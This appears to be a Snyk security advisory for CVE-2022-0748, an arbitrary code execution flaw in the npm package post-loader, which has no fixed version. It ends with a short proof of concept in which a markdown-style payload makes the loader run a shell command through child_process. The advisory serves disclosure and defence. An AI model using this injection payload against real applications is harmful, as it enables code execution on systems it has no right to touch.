Arbitrary Code Execution Affecting post-loader package, versions >=0.0.0
Threat Intelligence
EPSS
0.37% (73rd
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-POSTLOADER-2403737
- published 2 Mar 2022
- disclosed 16 Feb 2022
- credit Feng Xiao and Zhongfu Su
Introduced: 16 Feb 2022
CVE-2022-0748 Open this link in a new tabHow to fix?
There is no fixed version for post-loader
.
Overview
Affected versions of this package are vulnerable to Arbitrary Code Execution which uses a markdown parser in an unsafe way so that any javascript code inside the markdown input files gets evaluated and executed.
PoC
const postLoader = require('post-loader')
var payload = '---js\n((require("child_process")).execSync("touch rce"))';
new postLoader(payload);
CVSS Scores
version 3.1